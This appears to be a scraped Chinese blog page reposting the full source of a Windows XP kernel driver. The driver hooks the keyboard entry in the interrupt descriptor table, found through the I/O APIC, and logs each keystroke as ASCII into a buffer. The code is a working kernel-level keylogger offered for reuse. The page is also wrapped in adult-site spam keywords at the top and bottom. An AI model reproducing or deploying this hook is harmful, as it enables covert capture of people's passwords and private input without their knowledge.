#include#defineMAX_CHAR" />

欧美三区_成人在线免费观看视频_欧美极品少妇xxxxⅹ免费视频_a级毛片免费播放_鲁一鲁中文字幕久久_亚洲一级特黄

修改鍵盤中斷描述符表

系統 1655 0

修改中斷描述符表(IDT)中的鍵盤入口實現按健記錄,把讀取到的鍵盤掃描碼轉換成 ascii 碼記錄下來。查找鍵盤入口采用了查詢 IO APIC 的重定向寄存器的方法(通過把物理地址 0xFEC00000 映射為虛擬地址,然后讀取鍵盤中斷向量,最難得是沒有 xpsp2 的限制了。這是我從別處轉過來的驅動源碼, Windows XP Checked Build Environment測試過。 

    
      
        #include <ntddk.h>
        

        

#include <stdio.h>
        

        

        

#define	MAX_CHARS			256
        

        

#define MAKELONG(a, b) ((unsigned long) (((unsigned short) (a)) | ((unsigned long) ((unsigned short) (b))) << 16))
        

        

        

        

PUCHAR KEYBOARD_PORT_60 = (PUCHAR)0x60;
        

        

PUCHAR KEYBOARD_PORT_64 = (PUCHAR)0x64;
        

        

        

// status register bits
        

        

#define IBUFFER_FULL		0x02
        

        

#define OBUFFER_FULL		0x01
        

        

        

// flags for keyboard status
        

        

#define	S_SHIFT				1
        

        

#define	S_CAPS				2
        

        

#define	S_NUM				4
        

        

        

int kb_status = S_NUM;
        

        

        

///////////////////////////////////////////////////
        

        

// IDT structures
        

        

///////////////////////////////////////////////////
        

        

#pragma pack(1)
        

        

        

// entry in the IDT, this is sometimes called
        

        

// an "interrupt gate"
        

        

typedef struct
        

        

{
        

        

	unsigned short LowOffset;
        

        

	unsigned short selector;
        

        

	unsigned char unused_lo;
        

        

	unsigned char segment_type:4;	//0x0E is an interrupt gate
        

        

	unsigned char system_segment_flag:1;
        

        

	unsigned char DPL:2;	// descriptor privilege level 
        

        

	unsigned char P:1; /* present */
        

        

	unsigned short HiOffset;
        

        

} IDTENTRY;
        

        

        

/* sidt returns idt in this format */
        

        

typedef struct
        

        

{
        

        

	unsigned short IDTLimit;
        

        

	unsigned short LowIDTbase;
        

        

	unsigned short HiIDTbase;
        

        

} IDTINFO;
        

        

        

#pragma pack()
        

        

        

int	kb_int = 0x93;
        

        

        

unsigned long old_ISR_pointer;
        

        

unsigned char keystroke_buffer[MAX_CHARS];
        

        

int kb_array_ptr=0;
        

        

        

unsigned char asciiTbl[]={
        

        

    0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09,	//normal
        

        

    0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73,
        

        

    0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x7A, 0x78, 0x63, 0x76,
        

        

    0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        

        

    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
        

        

    0x32, 0x33, 0x30, 0x2E,
        

        

    0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09,	//caps
        

        

    0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x5B, 0x5D, 0x0D, 0x00, 0x41, 0x53,
        

        

    0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x5A, 0x58, 0x43, 0x56,
        

        

    0x42, 0x4E, 0x4D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        

        

    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
        

        

    0x32, 0x33, 0x30, 0x2E,
        

        

    0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09,	//shift
        

        

    0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x7B, 0x7D, 0x0D, 0x00, 0x41, 0x53,
        

        

    0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x5A, 0x58, 0x43, 0x56,
        

        

    0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        

        

    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
        

        

    0x32, 0x33, 0x30, 0x2E,
        

        

    0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09,	//caps + shift
        

        

    0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x7B, 0x7D, 0x0D, 0x00, 0x61, 0x73,
        

        

    0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x7A, 0x78, 0x63, 0x76,
        

        

    0x62, 0x6E, 0x6D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        

        

    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
        

        

    0x32, 0x33, 0x30, 0x2E
        

        

};
        

        

        

ULONG WaitForKbRead()
        

        

{
        

        

	int i = 100;
        

        

	UCHAR mychar;
        

        

        

	do
        

        

	{
        

        

		mychar = READ_PORT_UCHAR( KEYBOARD_PORT_64 );
        

        

        

		KeStallExecutionProcessor(666);
        

        

        

		if(!(mychar & OBUFFER_FULL)) break;
        

        

	}
        

        

	while (i--);
        

        

        

	if(i) return TRUE;
        

        

	return FALSE;
        

        

}
        

        

        

ULONG WaitForKbWrite()
        

        

{
        

        

	int i = 100;
        

        

	UCHAR mychar;
        

        

        

	do
        

        

	{
        

        

		mychar = READ_PORT_UCHAR( KEYBOARD_PORT_64 );
        

        

        

		KeStallExecutionProcessor(666);
        

        

        

		if(!(mychar & IBUFFER_FULL)) break;
        

        

	}
        

        

	while (i--);
        

        

        

	if(i) return TRUE;
        

        

	return FALSE;
        

        

}
        

        

        

VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
        

        

{
        

        

	IDTINFO		idt_info;
        

        

	IDTENTRY*	idt_entries;
        

        

	char _t[255];
        

        

        

	// load idt_info
        

        

	__asm	sidt	idt_info	
        

        

	idt_entries = (IDTENTRY*) MAKELONG(idt_info.LowIDTbase,idt_info.HiIDTbase);
        

        

        

	DbgPrint("UnHooking Interrupt...");
        

        

        

	// restore the original interrupt handler
        

        

	__asm cli
        

        

	idt_entries[kb_int].LowOffset = (unsigned short) old_ISR_pointer;
        

        

	idt_entries[kb_int].HiOffset = (unsigned short)((unsigned long)old_ISR_pointer >> 16);
        

        

	__asm sti
        

        

        

	DbgPrint("UnHooking Interrupt complete.");
        

        

        

	DbgPrint("Keystroke Buffer is: ");
        

        

	DbgPrint("%s", keystroke_buffer);
        

        

}
        

        

        

// using stdcall means that this function fixes the stack before returning (opposite of cdecl)
        

        

void __stdcall print_keystroke()
        

        

{
        

        

	UCHAR	sch, ch = 0;
        

        

	int		off = 0;
        

        

        

	WaitForKbRead();
        

        

	sch = READ_PORT_UCHAR(KEYBOARD_PORT_60);
        

        

	if (sch == 0xE0)
        

        

	{
        

        

		WaitForKbRead();
        

        

		sch = READ_PORT_UCHAR(KEYBOARD_PORT_60);
        

        

	}
        

        

        

	if (kb_status & S_CAPS)
        

        

		off += 0x54;
        

        

	if (kb_status & S_SHIFT)
        

        

		off += 0x54 * 2;
        

        

        

	if ((sch & 0x80) == 0)	//make
        

        

	{
        

        

		if ((sch < 0x47) || 
        

        

			((sch >= 0x47 && sch < 0x54) && (kb_status & S_NUM))) // Num Lock
        

        

		{
        

        

			ch = asciiTbl[off+sch];
        

        

		}
        

        

        

		switch (sch)
        

        

		{
        

        

		case 0x3A:
        

        

			kb_status ^= S_CAPS;
        

        

			break;
        

        

        

		case 0x2A:
        

        

		case 0x36:
        

        

			kb_status |= S_SHIFT;
        

        

			break;
        

        

        

		case 0x45:
        

        

			kb_status ^= S_NUM;
        

        

		}
        

        

	}
        

        

	else		//break
        

        

	{
        

        

		if (sch == 0xAA || sch == 0xB6)
        

        

			kb_status &= ~S_SHIFT;
        

        

	}
        

        

        

	if (ch >= 0x20 && ch < 0x7F)
        

        

	{
        

        

		keystroke_buffer[kb_array_ptr++] = ch;
        

        

		keystroke_buffer[kb_array_ptr] = '/0';
        

        

		if (kb_array_ptr >= MAX_CHARS-1)
        

        

		{
        

        

			kb_array_ptr = 0;
        

        

		}
        

        

	}
        

        

        

	//put scancode back (works on PS/2)
        

        

	WRITE_PORT_UCHAR(KEYBOARD_PORT_64, 0xD2); //command to echo back scancode	
        

        

	WaitForKbWrite();
        

        

	WRITE_PORT_UCHAR(KEYBOARD_PORT_60, sch); //write the scancode to echo back
        

        

}
        

        

        

// naked functions have no prolog/epilog code - they are functionally like the 
        

        

// target of a goto statement
        

        

__declspec(naked) my_interrupt_hook()
        

        

{
        

        

	__asm
        

        

	{
        

        

		pushad					// save all general purpose registers
        

        

		pushfd					// save the flags register
        

        

		call	print_keystroke	// call function
        

        

		popfd					// restore the flags
        

        

		popad					// restore the general registers
        

        

		jmp		old_ISR_pointer	// goto the original ISR
        

        

	}
        

        

}
        

        

        

// Intel 82093AA I/O Advanced Programmable Interrupt Controller (I/O APIC) Datasheet.pdf
        

        

int search_irq1()
        

        

{
        

        

	unsigned char *pIoRegSel;
        

        

	unsigned char *pIoWin;
        

        

	unsigned char ch;
        

        

        

	PHYSICAL_ADDRESS	phys;
        

        

	PVOID				pAddr;
        

        

        

	phys.u.LowPart = 0xFEC00000;
        

        

	pAddr = MmMapIoSpace(phys, 0x14, MmNonCached);
        

        

	if (pAddr == NULL)
        

        

		return 0;
        

        

        

	pIoRegSel = (unsigned char *)pAddr;
        

        

	pIoWin = (unsigned char *)(pAddr) + 0x10;
        

        

        

/*
        

        

{
        

        

	int  i;
        

        

	unsigned char j;
        

        

        

	for (i = 0, j = 0x10; i <= 0x17; i++, j += 2)
        

        

	{
        

        

		*pIoRegSel = j;
        

        

		ch = *pIoWin;
        

        

		DbgPrint("RedTbl[%02d]: 0x%02X/n", i, ch);
        

        

	}
        

        

}
        

        

*/
        

        

        

	*pIoRegSel = 0x12;	// irq1
        

        

	ch = *pIoWin;
        

        

        

	MmUnmapIoSpace(pAddr, 0x14);
        

        

        

	return (int)ch;
        

        

}
        

        

        

NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
        

        

{
        

        

	IDTINFO		idt_info;
        

        

	IDTENTRY*	idt_entries;
        

        

	char _t[255];
        

        

        

	theDriverObject->DriverUnload  = OnUnload; 
        

        

        

	kb_int = search_irq1();
        

        

	DbgPrint("kb_int = 0x%02X/n", kb_int);
        

        

        

	// load idt_info
        

        

	__asm	sidt	idt_info
        

        

        

	idt_entries = (IDTENTRY*) MAKELONG(idt_info.LowIDTbase,idt_info.HiIDTbase);
        

        

        

	DbgPrint("Hooking Interrupt...");
        

        

	old_ISR_pointer = MAKELONG(idt_entries[kb_int].LowOffset,idt_entries[kb_int].HiOffset);
        

        

        

	// remember we disable interrupts while we patch the table
        

        

	__asm cli
        

        

	idt_entries[kb_int].LowOffset = (unsigned short)my_interrupt_hook;
        

        

	idt_entries[kb_int].HiOffset = (unsigned short)((unsigned long)my_interrupt_hook >> 16);
        

        

	__asm sti
        

        

        

	DbgPrint("Hooking Interrupt complete: Old = 0x%08X, New = 0x%08X/n", old_ISR_pointer, my_interrupt_hook);
        

        

        

	return STATUS_SUCCESS;
        

        

//	return STATUS_DEVICE_CONFIGURATION_ERROR;
        

        

}

修改鍵盤中斷描述符表


更多文章、技術交流、商務合作、聯系博主

微信掃碼或搜索:z360901061

微信掃一掃加我為好友

QQ號聯系: 360901061

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。

【本文對您有幫助就好】

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描上面二維碼支持博主2元、5元、10元、自定義金額等您想捐的金額吧,站長會非常 感謝您的哦!!!

發表我的評論
最新評論 總共0條評論
主站蜘蛛池模板: 99热这里只有精品久久免费 | 九九热视频免费 | 亚洲午夜久久久精品影院 | 91网站免费观看 | 日韩一区二区三区四区 | 欧美一级小视频 | 久久国产综合 | 午夜在线免费观看 | 色之综合天天综合色天天棕色 | 亚洲精品久久九九热 | 一级片在线观看 | 亚洲影视在线观看 | 9999久久| 久青草免费在线视频 | 日产国产欧美视频一区精品 | 天天干天天夜 | 色3344| 日韩欧美综合在线二区三区 | 222奇米影视 | 97se亚洲综合在线韩国专区福利 | 日本久久影视 | 亚洲午夜精品一区二区 | 国产二区三区在线播放 | 日本亚洲一区二区 | 成年人在线播放视频 | 欧美成人全部视频 | 亚洲国产成人精品女人 | 91偷拍精品一区二区三区 | 午夜伦理影院 | 亚洲AV在线无码播放毛片浪潮 | 国产精品爱啪在线线免费观看 | av在线播放国产 | 黑人操亚洲人 | 韩国美女激情视频一区二区 | 超碰欧美 | 97理论三级九七午夜在线观看 | 女同久久另类99精品国产 | 色综合99| 午夜精品久久久久久99热软件 | www.日日操| 看片地址 |